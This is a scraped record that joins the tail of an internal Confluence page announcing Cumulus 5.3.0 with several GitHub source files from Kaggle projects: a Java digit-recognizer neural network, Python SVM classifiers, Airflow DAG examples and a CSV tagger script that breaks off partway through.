here.\\\\u0022,\\\\u0022search.ui.result.subtitle.space\\\\u0022:\\\\u0022Space\\\\u0022,\\\\u0022search.ui.filter.space.init.heading\\\\u0022:\\\\u0022recent spaces\\\\u0022}\"; WRM.\\_unparsedData\\[\"com.atlassian.whisper.atlassian-whisper-plugin:atlassian-whisper-bootstrap.WhisperData\"\\]=\"{\\\\u0022hasMessages\\\\u0022:true,\\\\u0022syncInit\\\\u0022:false,\\\\u0022userEmail\\\\u0022:\\\\[email protected]\\\\u0022,\\\\u0022baseUrl\\\\u0022:\\\\u0022https:\\\\u005C/\\\\u005C/rochewiki.roche.com\\\\u005C/confluence\\\\u0022}\"; if(window.WRM.\\_dataArrived)window.WRM.\\_dataArrived(); \n\nIMPORTANT: IMPORTANT: 6th January is a national holiday and the DevTools Team is out of office. We will resume work on Tuesday, 7th January. \nIn case of critical issues, call +48 61 279 3485.\n\nwindow.dataLayer = window.dataLayer || \\[\\]; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-134494057-1'); \n\n* [Skip to content](#title-heading)\n* [Skip to breadcrumbs](#breadcrumbs)\n* [Skip to header menu](#header-menu-bar)\n* [Skip to action menu](#navigation)\n* [Skip to quick search](#quick-search-query)\n\n[Linked Applications](#app-switcher)\n\nLoading…\n\n[Roche Wiki](/confluence/)\n==========================\n\n* [Spaces](/confluence/spacedirectory/view.action \"Spaces\")\n* [People](/confluence/browsepeople.action \"People\")\n* [Questions](/confluence/qa/questions)\n* [Create](# \"Create from template\")\n\n* Hit enter to search\n \n* [Help](# \"Help\")\n \n * [Online Help](https://docs.atlassian.com/confluence/docs-615/ \"Visit the Confluence documentation home\")\n * [Keyboard Shortcuts](/confluence \"View available keyboard shortcuts\")\n * [Feed Builder](/confluence/dashboard/configurerssfeed.action \"Create your custom RSS feed.\")\n * [What’s new](https://confluence.atlassian.com/display/DOC/Confluence+6.15+Release+Notes?a=false)\n * [Available Gadgets](/confluence \"Browse gadgets provided by Confluence\")\n * [About Confluence](/confluence/aboutconfluencepage.action \"Get more information about Confluence\")\n \n\n* [\n \n ](# \"Goel, Shubham {DMSL~Santa Clara}\")\n \n * [Add personal space…](/confluence/spaces/createpersonalspace.action)\n * [Recently viewed](/confluence/users/viewuserhistory.action)\n * [Recently worked on](/confluence/dashboard.action#recently-worked)\n \n * [Profile](/confluence/users/viewmyprofile.action)\n * [Tasks](/confluence/plugins/inlinetasks/mytasks.action)\n * [Saved for later](/confluence/users/viewmyfavourites.action)\n * [Watches](/confluence/users/viewnotifications.action)\n * [Drafts](/confluence/users/viewmydrafts.action)\n * [Network](/confluence/users/viewfollow.action?username=goels1)\n * [Settings](/confluence/users/viewmysettings.action)\n \n * [Log Out](/confluence/logout.action)\n \n\n \n\n[![Roche Sequencing Solutions](/confluence/download/attachments/280833218/RSS?version=3&modificationDate=1431532538000&api=v2)](/confluence/display/RSS/Roche+Sequencing+Solutions+Home+Page \"Roche Sequencing Solutions\")\n\n[Roche Sequencing Solutions](/confluence/display/RSS/Roche+Sequencing+Solutions+Home+Page \"Roche Sequencing Solutions\")\n\n* [Blog](/confluence/pages/viewrecentblogposts.action?key=RSS)\n* [Questions](/confluence/display/RSS/qa/questions)\n\n##### Space shortcuts\n\n* [HTP Gen 1.1 Project](/confluence/display/RSS/HTP+Gen+1.1+Project)\n* [E2E Systems Development](/confluence/display/RSS/E2E+Systems+Development)\n* [Sub Project Team (SPT) Focus Areas](/confluence/display/RSS/Sub+Project+Team+%28SPT%29+Focus+Areas)\n* [Blaze System - NIPT on Nanopore Program](/confluence/display/RSS/Blaze+System+-+NIPT+on+Nanopore+Program)\n* [RSS Confluence How-To's and General Usage Information](/confluence/display/RSS/RSS+Confluence+How-To%27s+and+General+Usage+Information)\n* [RSS Confluence FAQ page](/confluence/display/RSS/RSS+Confluence+FAQ+page)\n* [How-to articles](/confluence/display/RSS/How-to+articles)\n* [File lists](/confluence/display/RSS/File+lists)\n* [Meeting notes](/confluence/display/RSS/Meeting+notes)\n\n##### Page tree\n\n \n\n \n\n[](/confluence/collector/pages.action?key=RSS)<h2>Space Details</h2><div class=\"personal-space-logo-hint\">Your profile picture is used as the logo for your personal space. <a href=\"/confluence/users/profile/editmyprofilepicture.action\" target=\"\\_blank\">Change your profile picture</a>.</div>\n\nBrowse pages\n\nConfigureSpace tools\n\n* [Save for later](/confluence \"Save for later\")\n* [Watch](/confluence \"Watch (w)\")\n* [Share](/confluence \"Share this page with others\")\n* [](#)\n \n * [Attachments (3)](/confluence/pages/viewpageattachments.action?pageId=454201150 \"View Attachments\")\n * [Page History](/confluence/pages/viewpreviousversions.action?pageId=454201150)\n * [Restrictions](/confluence/pages/viewinfo.action?pageId=454201150 \"Edit restrictions\")\n \n * [Page Information](/confluence/pages/viewinfo.action?pageId=454201150)\n * [Resolved comments](/confluence)\n * [View in Hierarchy](/confluence/pages/reorderpages.action?key=RSS&openId=454201150#selectedPageInHierarchy)\n * [View Source](/confluence/plugins/viewsource/viewpagesrc.action?pageId=454201150)\n * [Export to PDF](/confluence/spaces/flyingpdf/pdfpageexport.action?pageId=454201150)\n * [Export to Word](/confluence/exportword?pageId=454201150)\n \n * [Copy](/confluence/pages/copypage.action?idOfPageToCopy=454201150&spaceKey=RSS)\n \n\n1. [Dashboard](/confluence/collector/pages.action?key=RSS)\n2. **…**\n3. [Roche Sequencing Solutions Home Page](/confluence/display/RSS/Roche+Sequencing+Solutions+Home+Page)\n4. [Roche Sequencing Solutions Home](/confluence/display/RSS/Roche+Sequencing+Solutions+Home)\n5. [(SBI) Software & BioInformatics](/confluence/pages/viewpage.action?pageId=328412130)\n6. [Nanopore Sequencing Software](/confluence/display/RSS/Nanopore+Sequencing+Software)\n7. [Cloud & Analysis](/confluence/pages/viewpage.action?pageId=329557564)\n8. [Release Notes](/confluence/display/RSS/Release+Notes)\n9. [Cumulus Release Notes](/confluence/display/RSS/Cumulus+Release+Notes)\n\n[Skip to end of banner](#page-banner-end)\n\n* Jira links\n\n[Go to start of banner](#page-banner-start)\n\n[Cumulus 5.3.0- Release Notes](/confluence/display/RSS/Cumulus+5.3.0-+Release+Notes)\n====================================================================================\n\n<table class=\"aui\"> <thead> <tr class=\"header\"> <th class=\"search-result-title\">Page Title</th> <th class=\"search-result-space\">Space</th> <th class=\"search-result-date\">Updated</th> </tr> </thead> </table> <p class=\"search-result-count\">{0}</p> <tr class=\"search-result\"> <td class=\"search-result-title\"><a href=\"{1}\" class=\"content-type-{2}\"><span>{0}</span></a></td> <td class=\"search-result-space\"><a class=\"space\" href=\"/confluence/display/{4}/\" title=\"{3}\">{3}</a></td> <td class=\"search-result-date\"><span class=\"date\" title=\"{6}\">{5}</span></td> </tr> [Skip to end of metadata](#page-metadata-end)\n\n* Created by [Gairola, Ankit {DMSL~Santa Clara}]( /confluence/display/~gairolaa\n ), last modified on [Dec 23, 2019](/confluence/pages/diffpagesbyversion.action?pageId=454201150&selectedPageVersions=1&selectedPageVersions=2 \"Show changes\")\n\n[Go to start of metadata](#page-metadata-start)\n\nRelease Date: 23 Dec 2019\n\nCumulus 5.3.0 release version will have the following features:\n\n**Run Refresh Feature**\n\n* User can now Refresh the run manually using this feature\n\n![](/confluence/download/attachments/454201150/Screenshot%202019-12-17%20at%207.15.47%20PM.png?version=1&modificationDate=1577114262000&api=v2)![](/confluence/download/attachments/454201150/Screenshot%202019-12-17%20at%207.09.13%20PM.png?version=1&modificationDate=1577114257000&api=v2)\n\n**RunType Drop-Down in Create token page**\n\n* Added new Drop-down in create token page.\n\n![](/confluence/download/attachments/454201150/Screenshot%202019-12-23%20at%208.52.14%20PM.png?version=1&modificationDate=1577114688000&api=v2)\n\n \n\n \n\nFor any queries, please post through the Feedback button or directly post to #cumulus-bugs slack channel.\n\nRegards, \nCumulus Team\n\n \n\n \n\n* No labels\n* [Edit Labels](# \"Edit Labels\")\n\n[![User icon: Add a picture of yourself](/confluence/s/en_US/8100/5084f018d64a97dc638ca9a178856f851ea353ff/_/images/icons/profilepics/add_profile_pic.svg)](/confluence/users/profile/editmyprofilepicture.action \"Add a picture of yourself\")\n\nWrite a comment…\n\n[Add Comment](/confluence/display/RSS/Cumulus+5.3.0-+Release+Notes?showComments=true&showCommentArea=true#addcomment)\n\nOverview\n\nContent Tools\n\nActivity\n\n* Powered by [Atlassian Confluence](http://www.atlassian.com/software/confluence) 6.15.9\n* Printed by Atlassian Confluence 6.15.9\n* [Report a bug](https://support.atlassian.com/help/confluence)\n* [Atlassian News](http://www.atlassian.com/about/connected.jsp?s_kwcid=Confluence-stayintouch)\n\n[Atlassian](http://www.atlassian.com/)\n\n{\"serverDuration\": 146, \"requestCorrelationId\": \"736db0e34978e6d9\"} AJS.BigPipe = AJS.BigPipe || {}; AJS.BigPipe.metrics = AJS.BigPipe.metrics || {}; AJS.BigPipe.metrics.pageEnd = typeof window.performance !== \"undefined\" && typeof window.performance.now === \"function\" ? Math.ceil(window.performance.now()) : 0; AJS.BigPipe.metrics.isBigPipeEnabled = 'false' === 'true';\n" }, { "alpha_fraction": 0.6222910284996033, "alphanum_fraction": 0.635706901550293, "avg_line_length": 24.5, "blob_id": "a280a089e2601fb12311ff2dde12640d202794f6", "content_id": "abaf29f1ddfb0de9a30514c6b02eecdd78ce2633", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 969, "license_type": "no_license", "max_line_length": 58, "num_lines": 38, "path": "/test_sql_dag.py", "repo_name": "ShubhamGoel/test", "src_encoding": "UTF-8", "text": "from airflow import DAG\nfrom airflow.operators import PythonOperator, BashOperator\nfrom airflow.hooks import PostgresHook\nfrom datetime import datetime, timedelta\n\n# change these args as needed\ndefault_args = {\n 'owner': 'owner',\n 'depends_on_past': False,\n 'start_date': datetime(2020, 3, 3),\n 'email': ['[email protected]'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=1),\n}\n\ndag = DAG('test_sql', default_args=default_args)\n\npg_hook = PostgresHook(postgres_conn_id='cloudsql')\n\n# replace 'table' with a valid table in your DB\ndef test_query():\n q = 'SELECT * FROM leads;'\n results = pg_hook.get_records(q)\n print(results[:5])\n\ntask1 = PythonOperator(\n task_id='extract',\n python_callable=test_query,\n dag=dag)\n\ntask2 = BashOperator(\n task_id='denote_finish',\n bash_command='echo \"ALL DONE\"',\n dag=dag)\n\ntask1 >> task2\n" }, { "alpha_fraction": 0.6196388006210327, "alphanum_fraction": 0.6489841938018799, "avg_line_length": 25.08823585510254, "blob_id": "01a27260caf981f3dbdfdaa2204e24e8cc04b233", "content_id": "0ac84aaeb065704f3bf3f0efe227d934f12d2705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 886, "license_type": "no_license", "max_line_length": 72, "num_lines": 34, "path": "/bigquery_dag.py", "repo_name": "ShubhamGoel/test", "src_encoding": "UTF-8", "text": "from airflow import DAG\nfrom airflow.contrib.operators.bigquery_operator import BigQueryOperator\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2015, 6, 1),\n 'email': ['[email protected]'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n # 'queue': 'bash_queue',\n # 'pool': 'backfill',\n # 'priority_weight': 10,\n # 'end_date': datetime(2016, 1, 1),\n}\n\ndag = DAG(\n dag_id='bigQueryPipeline', \n default_args=default_args, \n schedule_interval=timedelta(1)\n)\n\nt1 = BigQueryOperator(\n task_id='bigquery_test',\n bql='SELECT COUNT(userId) FROM [events:EVENTS_20160501]',\n destination_dataset_table=False,\n bigquery_conn_id='bigquery_default',\n delegate_to=False,\n udf_config=False,\n dag=dag,\n)" } ]
3
marvbushi/Python_Data_Structures
https://github.com/marvbushi/Python_Data_Structures
4a3354dcc02fd21bf07e0640c02ebb56e5657a29
00c2f278fc1aad2eb6f0f284452166f72d65ad09
448cd10cc093810c86d5f0a41ce4114acf2c40c9
refs/heads/master
2020-04-05T09:02:08.497405
2018-11-08T17:48:55
2018-11-08T17:48:55
156,739,708
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.51171875, "alphanum_fraction": 0.58203125, "avg_line_length": 13.9375, "blob_id": "b87d8ebf6bbac55650d47760746cecc1a9480b32", "content_id": "4d1dcf4df3061cf62e949bd0650fd4a7abd2a36f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 512, "license_type": "no_license", "max_line_length": 37, "num_lines": 32, "path": "/Arrays.py", "repo_name": "marvbushi/Python_Data_Structures", "src_encoding": "UTF-8", "text": "\r\n\r\nfrom array import array\r\n\r\narr = array('i', [10,20,30,40,50])\r\n\r\n# Accessing array elements\r\nprint(\"Accessing array elements\")\r\nprint (arr[0])\r\nprint (arr[2])\r\nprint(\"-\" * 20)\r\n\r\n# insert()\r\nprint(\"Inserting 60 at index 1.....\")\r\narr.insert(1,60)\r\n\r\n# remove()\r\narr.remove(40)\r\nprint(\"-\" * 20)\r\n\r\n# Search\r\ntry:\r\n print(arr.index(40))\r\nexcept:\r\n print(\"Value not found\")\r\nprint(\"-\" * 20)\r\n\r\n# Updating\r\nprint(\"Updating index 2 equal to 80\")\r\narr[2] = 80\r\n\r\nprint(\"-\" * 20)\r\nfor x in arr:\r\n print(x)" } ]
1
Lewuathe/kaggle-repo
https://github.com/Lewuathe/kaggle-repo
d45a95cf55efb6e043a65975521f1c1dde3f8b4e
532defa5bd8d3bf29454ec2aa962c656ab8ae75e
36f8b0408e0569198e87fe2c007f84e0fa776a3e
refs/heads/master
2020-04-06T06:56:11.085081
2015-03-25T13:21:32
2015-03-25T13:21:32
14,251,889
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.4616503119468689, "alphanum_fraction": 0.48400580883026123, "avg_line_length": 34.269229888916016, "blob_id": "40bdf1e6da3eac385fe133f8a4cd70dccc2d44be", "content_id": "9d761189a0cdd1836b102e5c198f1abf595fe796", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5502, "license_type": "permissive", "max_line_length": 110, "num_lines": 156, "path": "/DigitRecognizer/src/main/java/Main.java", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "import com.lewuathe.magi.NeuralNetwork;\nimport com.lewuathe.magi.Util;\nimport com.orangesignal.csv.Csv;\nimport com.orangesignal.csv.CsvConfig;\nimport com.orangesignal.csv.CsvReader;\nimport com.orangesignal.csv.CsvWriter;\nimport com.orangesignal.csv.handlers.ResultSetHandler;\nimport com.orangesignal.csv.handlers.StringArrayListHandler;\n\nimport java.io.*;\nimport java.util.Arrays;\nimport java.util.DoubleSummaryStatistics;\nimport java.util.List;\nimport java.util.function.BiConsumer;\n\n/**\n * Created by sasakiumi on 4/24/14.\n */\npublic class Main {\n\n public static final int TRAIN_NUM = 41000;\n public static final int TEST_NUM = 100;\n public static final int ANS_NUM = 28000;\n public static final int EPOCHS = 15;\n public static final double LEARNING_RATE = 0.1;\n public static final int TRAINING_SET_CYCLE = 1;\n public static final double MIN_VALUE = 0.0000001;\n\n public static int maxIndex(double[] ds) {\n int maxIndex = 0;\n double max = -Double.MAX_VALUE;\n for (int i = 0; i < ds.length; i++) {\n if (max < ds[i]) {\n maxIndex = i;\n max = ds[i];\n }\n }\n return maxIndex;\n }\n\n public static double test() throws IOException {\n CsvConfig cfg = new CsvConfig();\n cfg.setSkipLines(1);\n CsvReader reader = new CsvReader(new FileReader(\"train.csv\"), cfg);\n List<String> s = reader.readValues();\n double[][] xs = new double[TRAIN_NUM][784];\n double[][] ys = new double[TRAIN_NUM][10];\n\n int count = 0;\n int[] numLayers = {784, 30, 10};\n NeuralNetwork nn = new NeuralNetwork(numLayers);\n for (int circle = 0; circle < TRAINING_SET_CYCLE; circle++) {\n while (count < TRAIN_NUM) {\n s = reader.readValues();\n for (int i = 1; i <= 784; i++) {\n xs[count][i - 1] = Double.parseDouble(s.get(i)) / 256.0;\n //xs[count][i - 1] += MIN_VALUE;\n }\n //xs[count] = Util.standardize(xs[count]);\n for (int i = 0; i < 10; i++) {\n if (Integer.parseInt(s.get(0)) == i) {\n ys[count][i] = 1.0;\n } else {\n ys[count][i] = 0.0;\n }\n }\n count++;\n }\n }\n\n double[][] testxs = new double[TEST_NUM][784];\n double[][] testys = new double[TEST_NUM][10];\n\n count = 0;\n while (count < TEST_NUM) {\n s = reader.readValues();\n for (int i = 1; i <= 784; i++) {\n testxs[count][i - 1] = Double.parseDouble(s.get(i)) / 256.0;\n //testxs[count][i - 1] += MIN_VALUE;\n }\n //testxs[count] = Util.standardize(testxs[count]);\n for (int i = 0; i < 10; i++) {\n if (Integer.parseInt(s.get(0)) == i) {\n testys[count][i] = 1.0;\n } else {\n testys[count][i] = 0.0;\n }\n }\n count++;\n }\n reader.close();\n nn.train(xs, ys, EPOCHS, LEARNING_RATE, 10, testxs, testys, new BiConsumer<double[][], double[][]>() {\n @Override\n public void accept(double[][] doubles, double[][] doubles2) {\n assert doubles.length == doubles2.length;\n int accuracy = 0;\n for (int i = 0; i < doubles.length; i++) {\n if (maxIndex(doubles[i]) == maxIndex(doubles2[i])) {\n accuracy++;\n }\n }\n System.out.printf(\"Accuracy: %d / %d\\n\", accuracy, TEST_NUM);\n }\n });\n\n CsvReader testReader = new CsvReader(new FileReader(\"test.csv\"), cfg);\n\n count = 0;\n double[][] ansxs = new double[ANS_NUM][784];\n\n while (count < 28000) {\n s = testReader.readValues();\n for (int i = 0; i < 784 ; i++) {\n ansxs[count][i] = Double.parseDouble(s.get(i)) / 256.0;\n }\n count++;\n }\n testReader.close();\n\n CsvWriter writer = new CsvWriter(new FileWriter(\"ans.csv\"));\n List<String> header = Arrays.asList(\"ImageId\", \"Label\");\n writer.writeValues(header);\n for (int i = 0; i < ansxs.length; i++) {\n double[] ret = nn.feedforward(ansxs[i]);\n int ans = maxIndex(ret);\n List<String> line = Arrays.asList(String.valueOf(i + 1), String.valueOf(ans));\n writer.writeValues(line);\n }\n writer.close();\n\n\n\n // Verification\n// int accurate = 0;\n// for (int i = 0; i < TEST_NUM; i++) {\n//// for (int j = 0; j < testxs[i].length; j++) {\n//// System.out.printf(\"%f \", testxs[i][j]);\n//// }\n// System.out.println(\"\");\n// double[] ans = nn.feedforward(testxs[i]);\n// for (int j = 0; j < ans.length; j++) {\n// System.out.printf(\"%f \", ans[j]);\n// }\n// System.out.println(\"\");\n// for (int j = 0; j < testys[i].length; j++) {\n// System.out.printf(\"%f \", testys[i][j]);\n// }\n// System.out.println(\"\\n------------\");\n// if (maxIndex(ans) == maxIndex(testys[i])) {\n// accurate++;\n// }\n// }\n// return (double) accurate / TEST_NUM;\n return 1.0;\n }\n}\n" }, { "alpha_fraction": 0.6227741241455078, "alphanum_fraction": 0.6438612937927246, "avg_line_length": 32.85714340209961, "blob_id": "3bcdb73b70444b2800b56aa3a6b515efc2432297", "content_id": "a72e7a51d8fd1803a1a09b71ee8a0fddd81faf5a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2134, "license_type": "permissive", "max_line_length": 133, "num_lines": 63, "path": "/data-science-london/src/grid_search.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom sklearn import svm\nfrom sklearn import cross_validation\nfrom sklearn import preprocessing\nfrom sklearn.grid_search import GridSearchCV\nimport numpy as np\nimport csv\n\ndef output_result(clf):\n test_feature_file = np.genfromtxt(open(\"../data/test.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n test_features = []\n print \"Id,Solution\"\n i = 1\n for test_feature in test_feature_file:\n print str(i) + \",\" + str(int(clf.predict(test_feature)[0]))\n i += 1\n\ndef get_score(clf, train_features, train_labels):\n X_train, X_test, y_train, y_test = cross_validation.train_test_split(train_features, train_labels, test_size=0.4, random_state=0)\n\n clf.fit(X_train, y_train)\n print clf.score(X_test, y_test) \n\ndef get_accuracy(clf, train_features, train_labels):\n scores = cross_validation.cross_val_score(clf, train_features, train_labels, cv=10)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\ndef grid_search(train_features, train_labels):\n param_grid = [\n {'C': [1, 10, 100, 1000], 'kernel': ['linear']},\n {'C': [1, 10, 100, 1000], 'gamma': [0.001, 0.0001], 'kernel': ['rbf']},\n ]\n \n clf = GridSearchCV(svm.SVC(C=1), param_grid, n_jobs=-1)\n clf.fit(train_features, train_labels)\n print clf.best_estimator_\n \n\nif __name__ == \"__main__\":\n# train_feature_file = csv.reader(open(\"train.csv\", \"rb\"))\n# train_label_file = csv.reader(open(\"trainLabels.csv\", \"rb\"))\n train_feature_file = np.genfromtxt(open(\"../data/train.csv\", \"rb\"), delimiter=\",\", dtype=float)\n train_label_file = np.genfromtxt(open(\"../data/trainLabels.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n train_features = []\n train_labels = []\n for train_feature, train_label in zip(train_feature_file, train_label_file):\n train_features.append(train_feature)\n train_labels.append(train_label)\n\n train_features = np.array(train_features)\n train_labels = np.array(train_labels)\n\n\n grid_search(train_features, train_labels)\n\n\n# clf.fit(train_features, train_labels)\n# output_result(clf)\n\n" }, { "alpha_fraction": 0.5683563947677612, "alphanum_fraction": 0.5867895483970642, "avg_line_length": 22.25, "blob_id": "45a00846ec72225276122785f6fba9e507d16201", "content_id": "f14e09128308dc47c49246532126da4401d3e395", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 651, "license_type": "permissive", "max_line_length": 92, "num_lines": 28, "path": "/conways-reverse-game-of-life/src/predict.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom sklearn import svm\nimport numpy as np\nimport csv\n\nif __name__ == \"__main__\":\n #train_file = np.genfromtxt(open(\"../data/train.csv\", \"rb\"), delimiter=\",\", dtype=float)\n train_file = csv.reader(open(\"../data/train.csv\", \"rb\"))\n\n train_features = []\n train_labels = []\n\n header = train_file.next()\n\n for train_row in train_file:\n delta = train_row[1]\n starts = train_row[2:402]\n stops = train_row[402:802]\n\n train_feature = delta + stops\n train_features.append(train_feature)\n train_labels.append(starts)\n\n clf = svm.SVR()\n clf.fit(\n" }, { "alpha_fraction": 0.4907834231853485, "alphanum_fraction": 0.4976958632469177, "avg_line_length": 26.200000762939453, "blob_id": "246810b43f6f186b9b8f1331154e933bbac9f187", "content_id": "e2057c104ce6708d13539752ef6f87342e94941f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "permissive", "max_line_length": 71, "num_lines": 15, "path": "/diabetic-retinopathy-detection/convert_labels.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport csv\n\nif __name__ == \"__main__\":\n with open('trainLabels.csv', 'r') as f:\n reader = csv.reader(f)\n header = next(reader)\n\n with open('converted_labels.txt', 'w') as wf:\n writer = csv.writer(wf, lineterminator='\\n', delimiter=' ')\n for row in reader:\n writer.writerow([row[0] + '.jpeg', row[1]])\n \n \n" }, { "alpha_fraction": 0.6277992129325867, "alphanum_fraction": 0.6455598473548889, "avg_line_length": 36, "blob_id": "45d684519f5d60a0b17cbf981d6d239ba97eb4d4", "content_id": "82406614734a58d39c2ab876fdcb4514b2dc1282", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1295, "license_type": "permissive", "max_line_length": 198, "num_lines": 35, "path": "/data-science-london/src/simple_svm.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom sklearn import svm\nimport numpy as np\nimport csv\n\nif __name__ == \"__main__\":\n# train_feature_file = csv.reader(open(\"train.csv\", \"rb\"))\n# train_label_file = csv.reader(open(\"trainLabels.csv\", \"rb\"))\n train_feature_file = np.genfromtxt(open(\"../data/train.csv\", \"rb\"), delimiter=\",\", dtype=float)\n train_label_file = np.genfromtxt(open(\"../data/trainLabels.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n train_features = []\n train_labels = []\n for train_feature, train_label in zip(train_feature_file, train_label_file):\n train_features.append(train_feature)\n train_labels.append(train_label)\n\n train_features = np.array(train_features)\n train_labels = np.array(train_labels)\n\n clf = svm.SVC(C=100, cache_size=200, class_weight=None, coef0=0.0, degree=3,gamma=0.001, kernel=\"rbf\", max_iter=-1, probability=False,random_state=None, shrinking=True, tol=0.001, verbose=False)\n\n clf.fit(train_features, train_labels)\n\n test_feature_file = np.genfromtxt(open(\"../data/test.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n test_features = []\n print \"Id,Solution\"\n i = 1\n for test_feature in test_feature_file:\n print str(i) + \",\" + str(int(clf.predict(test_feature)[0]))\n i += 1\n" }, { "alpha_fraction": 0.7521008253097534, "alphanum_fraction": 0.7521008253097534, "avg_line_length": 18.83333396911621, "blob_id": "b7600bd9089fbf63ce08b317ab4731eb5bb71dd8", "content_id": "99581a9dea0564020fb8c0e769eafda3c5d39a9b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 238, "license_type": "permissive", "max_line_length": 66, "num_lines": 12, "path": "/README.md", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "kaggle-repo\n===========\n\nKaggle programs\n\n## facebook-recruiting-iii-keyword-extraction\n\nhttp://www.kaggle.com/c/facebook-recruiting-iii-keyword-extraction\n\n## data-science-london\n\nhttp://www.kaggle.com/c/data-science-london-scikit-learn\n" }, { "alpha_fraction": 0.6516690850257874, "alphanum_fraction": 0.6681180596351624, "avg_line_length": 36.563636779785156, "blob_id": "85cc012f96136d89a6f015703ee1e5cd1b605745", "content_id": "d884ff1a033f333dfb95279c345e023415a22f43", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2067, "license_type": "permissive", "max_line_length": 198, "num_lines": 55, "path": "/data-science-london/src/cross_validation_svm.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom sklearn import svm\nfrom sklearn import cross_validation\nfrom sklearn import preprocessing\nimport numpy as np\nimport csv\n\ndef output_result(clf):\n test_feature_file = np.genfromtxt(open(\"../data/test.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n test_features = []\n print \"Id,Solution\"\n i = 1\n for test_feature in test_feature_file:\n print str(i) + \",\" + str(int(clf.predict(test_feature)[0]))\n i += 1\n\ndef get_score(clf, train_features, train_labels):\n X_train, X_test, y_train, y_test = cross_validation.train_test_split(train_features, train_labels, test_size=0.4, random_state=0)\n\n clf.fit(X_train, y_train)\n print clf.score(X_test, y_test) \n\ndef get_accuracy(clf, train_features, train_labels):\n scores = cross_validation.cross_val_score(clf, train_features, train_labels, cv=10)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n\nif __name__ == \"__main__\":\n# train_feature_file = csv.reader(open(\"train.csv\", \"rb\"))\n# train_label_file = csv.reader(open(\"trainLabels.csv\", \"rb\"))\n train_feature_file = np.genfromtxt(open(\"../data/train.csv\", \"rb\"), delimiter=\",\", dtype=float)\n train_label_file = np.genfromtxt(open(\"../data/trainLabels.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n train_features = []\n train_labels = []\n for train_feature, train_label in zip(train_feature_file, train_label_file):\n train_features.append(train_feature)\n train_labels.append(train_label)\n\n train_features = np.array(train_features)\n train_labels = np.array(train_labels)\n\n# min_max_scaler = preprocessing.MinMaxScaler()\n# train_features = preprocessing.normalize(train_features, norm=\"l2\")\n\n clf = svm.SVC(C=100, cache_size=200, class_weight=None, coef0=0.0, degree=3,gamma=0.001, kernel=\"rbf\", max_iter=-1, probability=False,random_state=None, shrinking=True, tol=0.001, verbose=False)\n get_accuracy(clf, train_features, train_labels)\n\n\n# clf.fit(train_features, train_labels)\n# output_result(clf)\n\n" }, { "alpha_fraction": 0.5477636456489563, "alphanum_fraction": 0.5610160231590271, "avg_line_length": 26.136363983154297, "blob_id": "5774180fe502b92d33312085d959992524a0655f", "content_id": "2a3cbf21daa117cb30c4f4dc7a427eebdfb458b8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1811, "license_type": "permissive", "max_line_length": 79, "num_lines": 66, "path": "/facebook-recruiting-iii-keyword-extraction/src/tagger.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport nltk\nimport sklearn\nimport csv\nimport re\nimport numpy as np\n\nimport os\nimport sys\n\nif __name__ == \"__main__\":\n#\n# Training data from Train.csv\n# Id, Title, Body, Tag\n#\n print \"Reading start\"\n train_file = csv.reader(open(\"Train.csv\", \"rb\"))\n train_header = train_file.next()\n\n test_file = csv.reader(open(\"Test.csv\", \"rb\"))\n test_header = test_file.next()\n\n result_file = open(\"Result.csv\", \"w\")\n result_file.write('\"Id\",\"Tags\"\\n')\n\n traindata = []\n testdata = []\n docs = []\n \n print \"Train Start\"\n i = 0\n for data in train_file:\n tokens = re.split(r\"\\W+\", nltk.clean_html(data[2]))\n #tokens = nltk.word_tokenize(nltk.clean_html(data[2]))\n docs.append(tokens)\n i += 1\n if i > 100000:\n break\n\n print \"Make collection start\"\n # Make the collection for calculating TF-IDF\n collection = 